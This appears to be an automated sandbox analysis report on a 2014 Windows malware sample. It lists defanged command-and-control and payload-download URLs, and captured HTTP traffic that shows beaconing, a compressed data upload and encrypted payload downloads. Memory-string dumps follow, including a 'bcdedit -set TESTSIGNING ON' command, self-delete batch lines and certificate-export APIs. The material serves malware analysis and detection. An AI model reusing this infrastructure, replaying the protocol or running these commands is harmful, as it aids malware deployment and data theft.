| hxxp://elwoodcinemas.com/wp-content/uploads/2014/02/Test.fb2 | 173.220.29.2 |
| hxxp://elwoodcinemas.com/header/27UKp.fb2 | |
| hxxp://95.211.192.195/tasks?version=106&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0 | |
| hxxp://ds-any-fp3-real.wa1.b.yahoo.com/ | |
| hxxp://95.211.192.195/data?version=1006&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0&type=8 | |
| newdirex.com | 173.220.29.2 |
| www.yahoo.com | 46.228.47.115 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tasks?version=106&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Connection: Keep-Alive
HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 14 Mar 2014 13:33:25 GMT
Content-Length: 0
Connection: keep-alive
HTTP/1.1 404 Not Found..Server: nginx..Date: Fri, 14 Mar 2014 13:33:25 GMT..Content-Length: 0..Connection: keep-alive......
POST /data?version=1006&group=0227&client=2fe8d181fcecd35bfe45e0bf12491463&computer=VIRUS1&os=5.1&latency=0.0&type=8 HTTP/1.1
User-Agent: Microsoft-CryptoAPI/6.1
Host: 95.211.192.195
Content-Length: 8005
Connection: Keep-Alive
Cache-Control: no-cache
MSCF....E.......,...................D.......p.........nDg| ._48.tmp..S..f...CK.\[s.Fv~....:[.`WI..^$q.IqHj..Q...L6J. ..."...u.C...j]....<8o.p..........I.x........?8...x.I.k......i...sN.[.npz...kty.0.h.g3W.....O.....j.._....... ....dA9..#.... ....|iz...V....P<BG..E!N.....X.x.....n.M....gO..].:....`]Z...*.o...S..-...i].$..3.a.l`.i^....~.......u==..!c....jJ.xV4......o.V.....\..g..0Ok..W....U...af....~f...........e.^.;#V-.O,Dg.1jv.Z.....L4..OO}lvLt.y..uk.`..P.....3..OF...(.Z.vNd..Bm..v~.?.N..i32....l._:.......v...X.....#^.gPN.B..........
_Bl.7v..<=.;.b.8.<ZH....( 6J......v........j7l,u....YD..(.....wIt..@K|Y*.... .XBt.q......h.....$.9..g...5....W.....q#x...gW....b....3..T..........jfm...v$.U...K.......X.2.S
Zj?kw.6:3....n(.vF.....k. ...J.R......U}..i..}~.n..gn.j.>...Dy..........A...o.}0=......3ta_....t.c.....i?y];G..3.e.].......T....?.............t{..3.....V.si6.4{:<6...X..y..D..Tlad.S2.M`./5......o..k.6....t.......a...|.0A.u...L..*.'.J%1....;.5...yk...~am...........uAU.q_...o{....E..60)._..0b_.g......-w.3P........3.n.....[.&..E..7......#U.....Ok.Y...4.jX&.*.5O..N...:a.<{.=...../U,.%...x.T>..lU4PJ.UC....1..;..... nP...F...].:.6.t[(.d.'..fQ.`9..Z....cg..V..~.....D..B.a......s.'`|..Ql...h\...U.i..~>......LOq.cE9.$.......R.U...
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Mar 2014 13:34:08 GMT
Content-Type: text/xml; charset="UTF-8"
Content-Length: 0
Connection: keep-alive
Content-Encoding: UTF-8
GET /header/27UKp.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: newdirex.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:09 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:03:27 GMT
Accept-Ranges: bytes
Content-Length: 469739
Connection: close
Content-Type: text/plain
ZZP......<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ...).y.%.7.(.7.?.7.J.7...7.%,s.d...n.....o..j.....5..uCH...(.......M..G....i.u.[..@(.......J.E.)..._.G.....K..(B...O...I...K...8..]J.......Z,...,..J...H.'.O..{E)......J6.yC..xH..x_*..I.......b.-.J...{......4...a].c1/.cyI.fy.._.....B.7.J.9.8.v. ..C....fl..........d/.............7Cl9.9.e.........J.h6Y.U.J...J...JE.r....J'C.F...n.. >....&S.B(..?.....P...*a....>........'...V..{[.zJM..F..qM..>K/..?Z.r.m..Im..H..../...E..>..RJ...N...N...................['k.Z(..J...K(......j..sM/..K...](..b.......^_I...$9...??..t4S..H(..>.V.H...Z...I........m..>s.R...9L&...,.q...yKo.>....k...BGyt.%.o.Sv..[...,c....8K,..w....L...S.....).\..yn.8N........'V.J...j..Pj...D...JSc..a..3S......J....G.t3&.yF.s.W&..F...,$.yl...bG.p....G'.T....OH..j.#.l.0...............q.KjP.h....o..Jk..f=....7......@Ar.k..........B...M...j%N..jI......lb..]..*....%.z....J..{.....lc....nC/...o......Y..Y..UG..b...U. ..t.PGr.k.............xB.......q-......H.w."...Y!.......D........@........r7..8J'......B.,.E....-..h.....@..K...J....Hi?......>....j....U..c..\....^....k.xI/..J..z...1..3|>.....Ct:l.i...9K<=}....Jxw.i}.sL$.s........Hl.q...z...>...H....J..[N.w../....._N<t...v.^.zYI$~..l.S....*.#.J.'.`.'.V...{.Sw.H...Hg....S....:...J\g..\g.....:...J...JPg..!.t..%....,ZSV.`.'....a[.R...H0.<......U...@...Z..t>.......~.3.R.......MP..;.. ...YJ...SF..S.&.J...Hm....W.~...z.....4(...z.B...~.K....~..NPB.....aH<o.....QB.z......A..S.....S...9z...J|'.`t'.......Sw....V...
<<
<<< skipped >>>
GET / HTTP/1.1
Host: VVV.yahoo.com
HTTP/1.1 301 Redirect
Date: Fri, 14 Mar 2014 13:35:14 GMT
Connection: close
Via: HTTP/1.1 ir7.fp.ir2.yahoo.com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: hXXps://VVV.yahoo.com/
Content-Length: 212
<HEAD><TITLE>Redirect</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. "<em>hXXps://VVV.yahoo.com/</em>".<p></B></FONT>..<!-- default "Redirect" response (301) -->.</BODY>....
GET /wp-content/uploads/2014/02/Test.fb2 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: elwoodcinemas.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 14 Mar 2014 13:35:06 GMT
Server: Apache
Last-Modified: Thu, 27 Feb 2014 12:02:10 GMT
Accept-Ranges: bytes
Content-Length: 256674
Connection: close
Content-Type: text/plain
ZZP.J....<..J..{N.'....AJ.:.J...S...F......MCa6AJ.[4k...9.7.8.p. ...).y.%.7.(.7.?.7.J.7...7.%,s.d...n......S.r.......Y..J.h..\..H........m.....{.P......J...N..&.UE.)...A.............4.O...J...K..mJ..../.3.,..Z..x.,.xO..vH......iO....R..E...^-..I...J..DN. .N...Jl.....y....].9./.cyIX).J.......I.7.J.w.8.v. t.....8t...A.....9zC.K.J.=)..Q9K.....g.9.t9Hn-9v......6Y.W.J...J.(.y.Br./..JSb.......7...?.KSb.JSb.....?...?...........J/..J,j.J..r.,.z ..0...c........O...H.............x|..c..Sc.NS..K........o..eAv.?...F.R../...D......8q..JD..I.v.....J.".B,..O,...5.../..Fo.....y>............... .N..[W...F.J.GyJD.'....?.A.........J..G...r..[9J.,>...rL).9>.....,.j..zw.......Q.6......... .}. ..._...Pl.x\....L..h...K...I...H.............N.g.F..D5.I...Z)..D.=._.7......,..J..MC.....j..fD.s....t|"F/..F.......Jl......B...?..8.....,.....|.w...E.....y..b....9_.W.....E(..J...*%Z...Z...wr..7z...|Kk..h......XJ}......n....'i.....J.R;I.......X..*6N...'..w"W|..s.C..../W...*.....K-..........K.*j......9..I.{....w#...M..w>..K....MU.......Np4...M-........Np...1..w..e.5K.w...R.......R....z..e..'.... .K..rDG.r.'i.Z!..qda.K%..F....T...'...R....I..l7.F.....h.@.w.....}...J'Q.qkd...Q...../U...)..#/i.J.e..........%i..T..8,Y.....B..?I.......K(.r..DtV.(.......0.....M...M.......Kn .......$"..6t...sB.-2?U.r?.<;.T..L'G...%.J'[.j)..S.h..ec.qo..E.......ac.:......$9....H..p.T7.M'.rH.......N...z.b...'.v....d........WkK..8j(..@......Hg.'..N.iJ.....~..T.......Xa....r../s..'...3zr.7.Q'V.:.i.JS.r......O.....E..;........E.......E..X..R..|.zN|.X@lhR6.
<<
<<< skipped >>>
GET / HTTP/1.1
Host: VVV.yahoo.com
HTTP/1.1 301 Redirect
Date: Fri, 14 Mar 2014 13:35:21 GMT
Connection: close
Via: HTTP/1.1 ir10.fp.ch1.yahoo.com (YahooTrafficServer/1.20.13 [c s f ])
Server: YTS/1.20.13
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Location: hXXps://VVV.yahoo.com/
Content-Length: 212
<HEAD><TITLE>Redirect</TITLE></HEAD>.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetica,Arial"><B>. "<em>hXXps://VVV.yahoo.com/</em>".<p></B></FONT>..<!-- default "Redirect" response (301) -->.</BODY>....
Map
Strings from Dumps
osuf.exe_604_rwx_010C0000_00006000:
PSSSSSSh
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
%s\drivers\%s.sys
\\.\NtSecureSys
\\.\NtSecureSys
ntdll.dll
ntdll.dll
svchost.exe
svchost.exe
EUDC\%d
EUDC\%d
KeDelayExecutionThread
KeDelayExecutionThread
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
msvcrt.dll
msvcrt.dll
osuf.exe_604_rwx_010D0000_00001000:
.text
.text
`.data
`.data
.idata
.idata
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
osuf.exe_604_rwx_01134000_00003000:
zcÁ
zcÁ
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}
Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}
osuf.exe_604_rwx_01750000_0006D000:
.text
.text
`.data
`.data
.idata
.idata
@.reloc
@.reloc
PSSSSSSh
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
%s\drivers\%s.sys
\\.\NtSecureSys
\\.\NtSecureSys
ntdll.dll
ntdll.dll
svchost.exe
svchost.exe
EUDC\%d
EUDC\%d
KeDelayExecutionThread
KeDelayExecutionThread
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
msvcrt.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
=65!c
=65!c
8=6(0?5 &
8=6(0?5 &
svp%uec
svp%uec
{zfnmt==.eno
{zfnmt==.eno
0123456789
0123456789
`82uURL
`82uURL
`8.sC
`8.sC
G%c_|
G%c_|
.Oex=
.Oex=
".xF=
".xF=
.Ol (
.Ol (
cxa6.xb
cxa6.xb
X?(xg.TD
X?(xg.TD
x.Na<\}
x.Na<\}
xKx.QW
xKx.QW
!^!<!><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>HTTP/1.1</pre><pre>REPORT</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>RegDeleteKeyExW</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>t.Ht$HHt</pre><pre>w%fkN</pre><pre>L$Â$</pre><pre>m9.td</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>3'393 7%7</pre><pre>4&4-41484</pre><pre>7#7'7 7/737</pre><pre>8‚8C8O8_8k8s8{8</pre><pre>4%5x5<6</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>urlmon.dll</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>Wadvapi32.dll</pre><pre>kernel32.dll</pre><pre>shell32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>cabinet.dll</pre><pre>%Documents and Settings%\%current user%\Application Data</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}</pre><b>Explorer.EXE_1212_rwx_02020000_0006D000:</b><pre>.text</pre><pre>`.data</pre><pre>.idata</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>=65!c</pre><pre>8=6(0?5 &</pre><pre>svp%uec</pre><pre>{zfnmt==.eno</pre><pre>0123456789</pre><pre>`82uURL</pre><pre>`8.sC</pre><pre>G%c_|</pre><pre>.Oex=</pre><pre>".xF=</pre><pre>.Ol (</pre><pre>cxa6.xb</pre><pre>X?(xg.TD</pre><pre>x.Na<\}</pre><pre>xKx.QW</pre><pre>!^!<!><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>HTTP/1.1</pre><pre>REPORT</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>RegDeleteKeyExW</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>t.Ht$HHt</pre><pre>w%fkN</pre><pre>L$Â$</pre><pre>m9.td</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>3'393 7%7</pre><pre>4&4-41484</pre><pre>7#7'7 7/737</pre><pre>8‚8C8O8_8k8s8{8</pre><pre>4%5x5<6</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>urlmon.dll</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>Wadvapi32.dll</pre><pre>kernel32.dll</pre><pre>shell32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>cabinet.dll</pre><pre>%Documents and Settings%\%current user%\Application Data</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{6D2DABD3-6C4A-40B1-20F5-810C00E3A21E}</pre></!></pre></!>